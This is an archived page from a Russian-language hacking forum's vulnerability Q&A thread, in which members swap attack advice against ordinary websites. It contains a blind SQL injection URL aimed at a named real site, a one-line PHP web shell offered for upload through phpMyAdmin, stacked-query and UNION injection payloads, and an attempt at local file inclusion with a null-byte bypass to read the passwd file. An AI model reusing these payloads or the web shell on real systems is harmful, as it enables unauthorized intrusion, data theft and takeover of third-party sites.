ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 972 из 1393 « Первая < 472872922962 968 969 970 971 972 973 974 975 976 98210221072 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9711  
Старый 29.10.2009, 11:05
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию
Цитата:
Сообщение от jokester  
Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт

Статью прочти, которую я дал в том посте
Ок,спасибо,буду разбираться.

http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
А какой смысл этого запроса,если все равно экран пустой?
Ответь плз.
 

  #9712  
Старый 29.10.2009, 11:11
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
А какой он должен быть, если скрипт вообще ничего не выводит?

Это blind. Пустой экран - TRUE , more than 1 row - FALSE

Статью прочти, которую я дал в том посте
 

  #9713  
Старый 29.10.2009, 12:21
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
Посоветуйте шелл который можно через pma залить,весом до 5кб и работающий magic_quotes_gpc On
 

  #9714  
Старый 29.10.2009, 12:50
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
<?php eval(stripslashes($_REQUEST[ev])); ?>
 

  #9715  
Старый 29.10.2009, 13:54
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
 

  #9716  
Старый 29.10.2009, 14:04
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от M1ks  
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..

в mysql - нет, если конечно скуля не в запросе "update".

а в mssql теоретически можно так script.php?id=4;update.....
 

  #9717  
Старый 29.10.2009, 15:56
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
Цитата:
Сообщение от M1ks  
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
MSSQL, PostgreSql, Oracle - любой ql-запрос, отделив его ";" от основного
 

  #9718  
Старый 29.10.2009, 16:01
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию
понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):
 

  #9719  
Старый 29.10.2009, 16:04
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Цитата:
Сообщение от M1ks  
понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):
https://forum.antichat.ru/thread98525.html
Если того что тема прикреплена уже мало, мб начать красить названия тем в цвета радуги и что бы их названия как баннеры на половину браузера вылезали?
__________________
..
 

  #9720  
Старый 29.10.2009, 23:27
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
Цитата:
Сообщение от eliteload  
-----------------------------------------------------------
"SELECT DISTINCT xxx FROM xxx, xxx WHERE xxx=xxx AND (xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' ) ORDER BY xxx";
-----------------------------------------------------------
помогите составить inj запрос )
?поле1=%'+and+поле2=-false+union+select+количество полей/*
 
 
Страница 972 из 1393 « Первая < 472872922962 968 969 970 971 972 973 974 975 976 98210221072 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ